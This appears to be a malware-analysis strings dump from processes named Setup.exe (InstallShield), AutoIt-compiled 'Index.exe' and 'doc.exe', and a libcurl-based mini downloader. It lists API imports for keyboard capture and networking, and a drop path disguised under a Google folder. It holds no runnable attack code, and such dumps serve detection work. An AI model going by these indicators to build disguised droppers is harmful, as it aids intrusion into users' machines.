<Support>\Engine\Log

SUPPORTDIR

SHOW_PASSWORD_DIALOG

HeaderPathFile=%s

User=%s

Password=%s

ProxyUser=%s

ProxyPassword=%s

Result=%s

-sel_langx

Software\Microsoft\Windows\CurrentVersion\Uninstall

setupdir\x

setup.bmp

setup.gif

SourceFile=%s

TargetFile=%s

0xlx.ini

B..\..\Shared\Setup\SetupPrereqMgr.cpp

Running setup prerequisites (%s)...

%%IS_PREREQF%%-%s

Prerequisites returning %d

Checking setup prerequisite '%s'

Prerequisite '%s' scheduled before feature selection

Features do not match for prerequisite '%s'

Features match for prerequisite '%s'

Marking prerequisite '%s' for install during ADMIN install

Skipping prerequisite '%s' because it was installed before the reboot

SOFTWARE\Microsoft\Windows\CurrentVersion

B/passive

..\..\Shared\Setup\SetupPreRequisite.cpp

CSetupPrerequisite::ExecutePrerequisite

Attempting to execute prerequisite: %s

Return Code from EXE: %d

CSetupPreRequisite::ExecuteGenericPrerequisite

Creating new process for prerequisite, launching command line %s [%s] %s

Prerequisite process exited with return code %d

Could not launch prerequisite, last error: %d, ShellExecute: %d

CSetupPreRequisite::ExecuteMsiWithProgress

Launching MSI prerequisite %s, command line %s

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx

SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations

PendingFileRenameOperations

[WindowsFolder]Wininit.ini

Reboot required - %s key added

FileRenameOperations

Wininit.ini rename

%s,%s,%s,%s,%s,%s

operatingsystemcondition

AltPrqURL

cmdlinesilent

[WindowsFolder]

[SETUPEXENAME]

[SETUPEXEDIR]

%ld %s

%s %ld %s

d.
d %s%s

ISBEW64.exe

kernel32.dll

%s%s%d.%s

SetupExe: %ls

SetupExeVersion: %ld.%ld.%ld.%ld

Windows 95

Windows 98

Windows Me

Windows NT 4.0

Windows 2000

Windows XP

Windows Server 2003

Windows Vista / Server 2008

Windows 7 / Server 2008 R2

Windows 8 / Server 2012

Windows 8.1 / Server 2012 R2

.Default\Control Panel\desktop\ResourceLocale

.DEFAULT\Control Panel\International

PSTORES.EXE

psapi.dll

Ntdll.dll

Cwininet.dll

RPAWINET.DLL

Software\Microsoft\Windows\CurrentVersion\Internet Settings

AutoConfigURL

Range: bytes=%d-

dest%d

source%d

InstallShieldPendingOperation

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

mscoree.dll

USER32.DLL

%hx.rra

uxtheme.dll

%d,%d

%d,%d,%d

Shcore.dll

E.dll

Advapi32.dll

InstallShield.log

%s[%s]: %s -- File: %s, Line: %d

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup.exe

@@10554;200

Do you wish to install %s?

This software has not been altered since publication by %s. To install %s, click OK.

Caution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.

The identity of this software publisher was verified by %s.

&Always trust software published by %s.

@@10652;200

You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.

Please enter the password

Password:

%sc%1 Setup is preparing the %2, which will guide you through the program setup process. Please wait.!Checking Operating System Version%Checking Windows(R) Installer Version

Configuring Windows Installer

Configuring %s

Setup has completed configuring the Windows Installer on your system. The system needs to be restarted in order to continue with the installation. Please click Restart to reboot the system.

The installer must restart your system to complete configuring the Windows Installer service. Click Yes to restart now or No if you plan to restart later.DThis setup will perform an upgrade of '%s'. Do you want to continue?XA later version of '%s' is already installed on this machine. The setup cannot continue.

Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 6 (or later version), before relaunching the installation'Error writing to the temporary location

-Error extracting %s to the temporary location'Error reading setup initialization file

Installer not found in %s

File %s not found#Internal error in Windows Installer

IError populating strings. Verify that all strings in Setup.ini are valid.

RestartQSetup needs %lu KB free disk space in %s. Please free up some space and try again

/V parameters to MsiExec.exejWindows(R) Installer %s found. This is an older version of the Windows(R) Installer. Click OK to continue.

ANSI code page for %s is not installed on the system and therefore setup cannot run in the selected language. Run the setup and select another language.

Setup requires Windows Installer version %s or higher to install the Microsoft .NET Framework version 2.0. Please install the Windows Installer version %s or higher and try again.

xThis setup does not contain the Windows Installer engine (%s) required to run the installation on this operating system.

'Unable to install %s Scripting Runtime.8Unable to create InstallDriver instance, Return code: %d;Please specify a location to save the installation package.

Unable to extract the file %s.

Downloading file %s.LAn error occurred while downloading the file %s. What would you like to do?

/sec&Failed to verify signature of file %s.

Estimated time remaining:  %d %s of %d %s downloaded at 
d.
d %s%s

Unable to save file: %s Failed to complete installation.

/UA<url to InstMsiA.exe>

/UW<url to InstMsiW.exe>

/UM<url to msi package>

/US<url to IsScript.msi>8Setup Initialization Error, failed to clone the process.:The file %s already exists. Would you like to replace it?

_Could not verify signature. You need Internet Explorer 3.02 or later with Authenticode update.hSetup requires a newer version of WinInet.dll. You may need to install Internet Explorer 3.02 or later.}You do not have sufficient privileges to complete this installation. Log on as administrator and then retry this installation=Error installing Microsoft(R) .NET Framework, Return Code: %dZ%s optionally uses the Microsoft (R) .NET %s Framework. Would you like to install it now?

Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 3 (or later version), before relaunching the installation\%s optionally uses the Visual J# Redistributable Package. Would you like to install it now? - (This will also install the .NET Framework.)

Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running Windows 2000 Service Pack 3 (or later version), before relaunching the installationw%s requires the following items to be installed on your computer. Click Install to begin installing these requirements.

Installing %sDWould you like to cancel the setup after %s has finished installing?

The files for installation requirement %s could not be found. The installation will now stop. This is probably due to a failed, or canceled download.XThe installation of %s appears to have failed. Do you want to continue the installation?

Skipped7The installation of %s has failed. Setup will now exit.gThe installation of %s requires a reboot. Click Yes to restart now or No if you plan to restart later.8%1 optionally uses %2. Would you like to install it now?

&Patch an existing instanceWThis installation requires Windows Installer version 4.5 or newer. Setup will now exit.

Authenticity Verified;The identity of this software publisher was verified by %s.lCaution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.'&Always trust software published by %s.UThis software has not been altered since publication by %s. To install %s, click OK.

%s - InstallShield Wizard

Setup has detected one or more instances of this application already installed on your system. You can maintain or update an existing instance or install a completely new instance.MSelect the instance of the application you want to &maintain or update below:

x%s Setup is preparing the InstallShield Wizard, which will guide you through the rest of the setup process. Please wait.

Error Information:3An error (%s) has occurred while running the setup.

Please make sure you have finished any previous setup and closed other applications. If the error still occurs, please contact your vendor: %s.

&Report}There is not enough space to initialize the setup. Please free up at least %ld KB on your %s drive before you run the setup.{A user with administrator rights installed this application. You need to have similar privileges to modify or uninstall it.tAnother instance of this setup is already running. Please wait for the other instance to finish and then try again.

The origin and integrity of this application could not be verified. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.

The origin and integrity of this application could not be verified because it was not signed by the publisher. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.

The origin and integrity of this application could not be verified. The certificate used to sign the software has expired or is invalid or untrusted. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.jThe software is corrupted or has been altered since it was published. You should not continue this setup.0This setup was created with a BETA VERSION of %s7This Setup was created with an EVALUATION VERSION of %s

This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full version of InstallShield supports this functionality. For more information, see InstallShield KB article Q200900.

This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s days after they were built. Please rebuild the setup to run it again. The setup will now exit.3This setup works until %s. The setup will now exit.

The path to the installation contains unsupported characters. Try moving the installation to a location that does not have special characters, and then try relaunching it.iThis setup requires administrative privileges that appear to be unavailable. Would you like to try again?

Copyright (c) 2014 Flexera Software LLC. All Rights Reserved.

InstallShield Setup.exe

21.0.289

Index.exe_1204:

.text

`.rdata

@.data

.rsrc

@.reloc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

WSOCK32.dll

VERSION.dll

WINMM.dll

COMCTL32.dll

MPR.dll

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

WININET.dll

PSAPI.DLL

IPHLPAPI.DLL

USERENV.dll

UxTheme.dll

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

KERNEL32.dll

OpenWindowStationW

SetProcessWindowStation

CloseWindowStation

MapVirtualKeyW

EnumChildWindows

EnumWindows

VkKeyScanW

GetKeyState

GetKeyboardState

SetKeyboardState

GetAsyncKeyState

keybd_event

EnumThreadWindows

ExitWindowsEx

UnregisterHotKey

RegisterHotKey

GetKeyboardLayoutNameW

USER32.dll

SetViewportOrgEx

GDI32.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegEnumKeyExW

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

cq-%C$

i.wx4

sC%uH

_APqZ.tp

nz.ye

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

> >$>(>=>

5o6q6

6!6%6)6-616

343C3n3v3}3

:&:*:.:2:

4#4'4 4/43474;4

<$<,<4<<<\=

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Index.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

doc.exe_640:

.text

`.rdata

@.data

.rsrc

@.reloc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

WSOCK32.dll

VERSION.dll

WINMM.dll

COMCTL32.dll

MPR.dll

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

WININET.dll

PSAPI.DLL

IPHLPAPI.DLL

USERENV.dll

UxTheme.dll

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

KERNEL32.dll

OpenWindowStationW

SetProcessWindowStation

CloseWindowStation

MapVirtualKeyW

EnumChildWindows

EnumWindows

VkKeyScanW

GetKeyState

GetKeyboardState

SetKeyboardState

GetAsyncKeyState

keybd_event

EnumThreadWindows

ExitWindowsEx

UnregisterHotKey

RegisterHotKey

GetKeyboardLayoutNameW

USER32.dll

SetViewportOrgEx

GDI32.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegEnumKeyExW

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

MI.ih

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

> >$>(>=>

5o6q6

6!6%6)6-616

343C3n3v3}3

:&:*:.:2:

4#4'4 4/43474;4

<$<,<4<<<\=

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

bdMiniDownloaderEG_MENAON-Mini_32_3313.exe_1128:

.text

`.rdata

@.data

.rsrc

@.reloc

UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU<UUU=>?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULMUUNUUUUUUUUUOUUPUQRST

!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FF<=>FF?FFFFF@ABFFFFFCFDFFFFFE

tcPh

%u Wj%

t.Gj:W

t-hL}J

SSSSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

<!--%s-->

&#xX;

</%s>

%s='%s'

%s="%s"

<![CDATA[%s]]>

standalone="%s"

encoding="%s"

version="%s"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

httpheader

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

portuguese-brazilian

.jpeg

.html

0123456789

PORT

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

Closing connection %d

Curl_addHandleToPipeline: length: %d

Found bundle for host %s: %p

Server doesn't support pipelining

Connection %d seems to be dead!

About to connect() to %s%s port %ld (#%ld)

Connected to %s (%s) port %ld (#%ld)

IDN support not present, can't parse Unicode domains

Protocol %s not supported or disabled in libcurl

[^:]:%[^

:]://%[^

<url> malformed

http_proxy

%5[^:@]:%5[^@]

:%5[^@]

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number too large: %lu

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

%s://%s

Found connection %d, with requests in the pipe (%d)

Re-using existing connection! (#%ld) with host %s

User-Agent: %s

Connection #%ld to host %s left intact

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Name '%s' family %i resolved to '%s' family %i

Couldn't bind to '%s'

getsockname() failed with errno %d: %s

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

getpeername() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

Failed connect to %s:%ld; %s

Could not set TCP_NODELAY: %s

TCP_NODELAY set

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Failed to connect to %s: %s

couldn't connect to %s at %s:%d

Pipe broke: handle 0x%p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %lld out of %lld bytes received

Internal error clearing splay node = %d

Internal error removing splay node = %d

%s:%d

%5[^:]:%d:%5s

Resolve %s found illegal!

Added %s:%d:%s to DNS cache

Could not resolve %s: %s

init_resolve_thread() failed for %s; %s

getaddrinfo() failed for %s:%d; %s

Send failure: %s

Recv failure: %s

[%s %s %s]

23[^;

=]=I99[^;

httponly

skipped cookie with illegal dotcount domain: %s

skipped cookie with bad tailmatch domain: %s

#HttpOnly_

%s cookie %s="%s" for domain %s, path %s, expire %lld

%s%s%s

# Netscape HTTP Cookie File

# hXXp://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

%s:%s:%s

%s:%.*s

%s:%s

%s:%s:x:%s:%s:%s

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"

%s, opaque="%s"

%s, algorithm="%s"

Couldn't open file %s

Can't open %s for writing

Can't get the size of %s

Last-Modified: %s, d %s M d:d:d GMT

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

LDAP local: %s

LDAP local: trying to establish %s connection

LDAP local: Cannot connect to %s:%hu

LDAP local: ldap_simple_bind_s %s

LDAP remote: %s

There are more than %d entries

CLIENT libcurl 7.30.0

MATCH %s %s %s

DEFINE %s %s

--:--:--

%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s

Failed to resolve "%s" for SOCKS4 connect.

SOCKS4%s request granted.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

User was rejected by the SOCKS5 server (%d %d).

SOCKS5 GSSAPI per-message authentication is not supported.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

Failed to resolve "%s" for SOCKS5 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Can't complete SOCKS5 connection to %s:%d. (%d)

Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)

Refusing to issue an RTSP request [%s] without a session ID.

Transport:

Transport: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Accept-Encoding: %s

Referer: %s

Range: %s

%s %s RTSP/1.0

Session: %s

%s%s%s%s%s%s

Unable to read the CSeq header: [%s]

Got RTSP Session ID Line [%s], but wanted ID [%s]

TFTP

set timeouts for state %d; Total %ld, retry %d maxtry %d

got option=(%s) value=(%s)

blksize is larger than max supported

%s (%d)

blksize is smaller than min supported

%s (%ld)

%s (%d) %s (%d)

invalid tsize -:%s:- value in OACK packet

%s%c%s%c

tftp_send_first: internal error

Received last DATA packet block %d again.

Received unexpected DATA packet block %d, expecting block %d

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: internal error

Received ACK for block %d, expecting %d

tftp_tx: giving up waiting for block %d ack

tftp_tx: internal error, event: %i

TFTP finished

bind() failed; %s

TFTP response timeout

LOGIN

USER %s

APOP %s %s

AUTH %s

No known authentication mechanisms supported!

STLS not supported.

STARTTLS denied. %c

Access denied. %c

Access denied: %d

Authentication failed: %d

PASS %s

%s %s

POP3S not supported!

login

password

%cd

LOGIN %s %s

AUTHENTICATE %s %s

AUTHENTICATE %s

LIST "%s" *

SELECT %s

FETCH %s BODY[%s]

APPEND %s (\Seen) {%lld}

LOGINDISABLED

STARTTLS not supported.

IMAPS not supported!

Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d

Adding handle: send: %d

Adding handle: recv: %d

Site %s:%d is pipeline blacklisted

Server %s is blacklisted

Server %s is not blacklisted

- Conn %d (%p) send_pipe: %d, recv_pipe: %d

Preparing for accepting server on data port

FTP response timeout

FTP response aborted due to select/poll error: %d

CWD %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

socket failure: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

Failure sending PORT command: %s

Connect data stream passively

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

SIZE %s

MDTM %s

APPE %s

STOR %s

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skips %d.%d.%d.%d for data connection, uses %s instead

%d.%d.%d.%d

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Failed to do PORT

dddddd

ddd d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

ftp server doesn't support SIZE

RETR %s

Failed FTP upload: 

RETR response: d

PBSZ %d

ACCT %s

Access denied: d

ACCT rejected by server: d

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

PRET command not accepted: d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

TYPE %c

Connecting to %s (%s) port %d

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

Failure sending QUIT command: %s

Uploading to a URL without a file name!

FTPS not supported!

operation aborted by callback

seek callback returned error %d

the ioctl callback returned %d

ioctl callback returned error %d

Rewinding stream by : %zd bytes on url %s (zero-length body)

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

HTTP server doesn't seem to support byte ranges. Cannot resume.

Problem (%d) in the Chunked-Encoded data

Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)

Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld

Operation timed out after %ld milliseconds with %lld bytes received

No URL set!

